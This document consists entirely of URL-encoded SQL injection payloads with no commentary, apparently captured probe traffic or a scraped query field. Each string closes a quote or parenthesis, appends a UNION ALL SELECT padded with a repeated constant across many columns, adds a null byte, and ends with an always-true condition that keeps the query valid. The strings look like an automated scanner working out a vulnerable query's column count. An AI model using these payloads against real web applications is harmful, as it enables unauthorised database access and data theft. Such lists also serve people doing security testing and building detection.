-2148%29%29%29%20UNION%20ALL%20SELECT%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%2C%204748%00%20AND%20%28%28%287631%3D7631 -3373%29%29%29%20UNION%20ALL%20SELECT%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%2C%205034%00%20AND%20%28%28%282209%3D2209 -9541%29%29%29%20UNION%20ALL%20SELECT%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%2C%206414%00%20AND%20%28%28%284375%3D4375 -8375%20UNION%20ALL%20SELECT%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%2C%203842%00 -5481%20UNION%20ALL%20SELECT%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%2C%208994%00 -7052%20UNION%20ALL%20SELECT%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%2C%202501%00 -8398%20UNION%20ALL%20SELECT%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%2C%209510%00 -6879%20UNION%20ALL%20SELECT%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%2C%201075%00 -1619%20UNION%20ALL%20SELECT%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%2C%209753%00 -6922%20UNION%20ALL%20SELECT%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%2C%209040%00 -4099%20UNION%20ALL%20SELECT%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%2C%201535%00 -3534%20UNION%20ALL%20SELECT%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%2C%202254%00 -5008%20UNION%20ALL%20SELECT%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%00 -5594%27%29%20UNION%20ALL%20SELECT%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%2C%208751%00%20AND%20%28%27xVMr%27%3D%27xVMr -3636%27%29%20UNION%20ALL%20SELECT%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%2C%201139%00%20AND%20%28%27WZex%27%3D%27WZex -6540%27%29%20UNION%20ALL%20SELECT%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%00%20AND%20%28%27nJUv%27%3D%27nJUv -4069%27%29%20UNION%20ALL%20SELECT%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%00%20AND%20%28%27tRgo%27%3D%27tRgo -4945%27%29%20UNION%20ALL%20SELECT%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%2C%204377%00%20AND%20%28%27lrhz%27%3D%27lrhz -3152%27%29%20UNION%20ALL%20SELECT%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%2C%205610%00%20AND%20%28%27HHxv%27%3D%27HHxv -8333%27%29%20UNION%20ALL%20SELECT%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%00%20AND%20%28%27QWca%27%3D%27QWca -4399%27%29%20UNION%20ALL%20SELECT%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%2C%204692%00%20AND%20%28%27bjam%27%3D%27bjam -9338%27%29%20UNION%20ALL%20SELECT%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%00%20AND%20%28%27FtjB%27%3D%27FtjB -5646%27%29%20UNION%20ALL%20SELECT%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%2C%207922%00%20AND%20%28%27tgGv%27%3D%27tgGv -3250%27%29%29%20UNION%20ALL%20SELECT%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%2C%204366%00%20AND%20%28%28%27MiCs%27%3D%27MiCs -3355%27%29%29%20UNION%20ALL%20SELECT%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%2C%208357%00%20AND%20%28%28%27Osrj%27%3D%27Osrj -5436%27%29%29%20UNION%20ALL%20SELECT%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%2C%209210%00%20AND%20%28%28%27NbDp%27%3D%27NbDp -6582%27%29%29%20UNION%20ALL%20SELECT%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%2C%207514%00%20AND%20%28%28%27tGfW%27%3D%27tGfW -1706%27%29%29%20UNION%20ALL%20SELECT%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%2C%209539%00%20AND%20%28%28%27bCFA%27%3D%27bCFA -8993%27%29%29%20UNION%20ALL%20SELECT%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%2C%209207%00%20AND%20%28%28%27NuGT%27%3D%27NuGT -5686%27%29%29%20UNION%20ALL%20SELECT%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%2C%208553%00%20AND%20%28%28%27RYro%27%3D%27RYro -4338%27%29%29%20UNION%20ALL%20SELECT%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%2C%203660%00%20AND%20%28%28%27IVge%27%3D%27IVge -8869%27%29%29%20UNION%20ALL%20SELECT%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%00%20AND%20%28%28%27GJuI%27%3D%27GJuI -7367%27%29%29%20UNION%20ALL%20SELECT%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%00%20AND%20%28%28%27zDLg%27%3D%27zDLg -8718%27%29%29%29%20UNION%20ALL%20SELECT%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%2C%209457%00%20AND%20%28%28%28%27RIxR%27%3D%27RIxR -8393%27%29%29%29%20UNION%20ALL%20SELECT%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%2C%202990%00%20AND%20%28%28%28%27hyhC%27%3D%27hyhC -1880%27%29%29%29%20UNION%20ALL%20SELECT%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%2C%204780%00%20AND%20%28%28%28%27CQai%27%3D%27CQai -2966%27%29%29%29%20UNION%20ALL%20SELECT%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%2C%209299%00%20AND%20%28%28%28%27AsFt%27%3D%27AsFt -9820%27%29%29%29%20UNION%20ALL%20SELECT%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%2C%205811%00%20AND%20%28%28%28%27MSUZ%27%3D%27MSUZ -5278%27%29%29%29%20UNION%20ALL%20SELECT%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%2C%205481%00%20AND%20%28%28%28%27VGio%27%3D%27VGio -4972%27%29%29%29%20UNION%20ALL%20SELECT%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%2C%205955%00%20AND%20%28%28%28%27xcvV%27%3D%27xcvV -5601%27%29%29%29%20UNION%20ALL%20SELECT%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%2C%205568%00%20AND%20%28%28%28%27mUUA%27%3D%27mUUA -7402%27%29%29%29%20UNION%20ALL%20SELECT%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%2C%208843%00%20AND%20%28%28%28%27Gjve%27%3D%27Gjve -8524%27%29%29%29%20UNION%20ALL%20SELECT%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%2C%209395%00%20AND%20%28%28%28%27fDJq%27%3D%27fDJq -4287%27%20UNION%20ALL%20SELECT%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%2C%203577%00%20AND%20%27gupM%27%3D%27gupM -9667%27%20UNION%20ALL%20SELECT%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%00%20AND%20%27mJHH%27%3D%27mJHH -6831%27%20UNION%20ALL%20SELECT%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%00%20AND%20%27RiSO%27%3D%27RiSO -2141%27%20UNION%20ALL%20SELECT%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%2C%209164%00%20AND%20%27dMhz%27%3D%27dMhz -9785%27%20UNION%20ALL%20SELECT%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%2C%201217%00%20AND%20%27gKrz%27%3D%27gKrz -2633%27%20UNION%20ALL%20SELECT%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%2C%201010%00%20AND%20%27igIa%27%3D%27igIa -6074%27%20UNION%20ALL%20SELECT%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%00%20AND%20%27oOns%27%3D%27oOns -5873%27%20UNION%20ALL%20SELECT%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%2C%203953%00%20AND%20%27qGOp%27%3D%27qGOp -9267%27%20UNION%20ALL%20SELECT%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%2C%202391%00%20AND%20%27HBAd%27%3D%27HBAd -2887%27%20UNION%20ALL%20SELECT%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%2C%209941%00%20AND%20%27AFUk%27%3D%27AFUk -6050%27%29%20UNION%20ALL%20SELECT%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%2C%209986%00%20AND%20%28%27gJGi%27%20LIKE%20%27gJGi -4691%27%29%20UNION%20ALL%20SELECT%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%2C%201215%00%20AND%20%28%27Butq%27%20LIKE%20%27Butq -3440%27%29%20UNION%20ALL%20SELECT%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%2C%204820%00%20AND%20%28%27xXei%27%20LIKE%20%27xXei -9205%27%29%20UNION%20ALL%20SELECT%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%2C%209218%00%20AND%20%28%27RaHf%27%20LIKE%20%27RaHf -4853%27%29%20UNION%20ALL%20SELECT%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%2C%208524%00%20AND%20%28%27bInB%27%20LIKE%20%27bInB 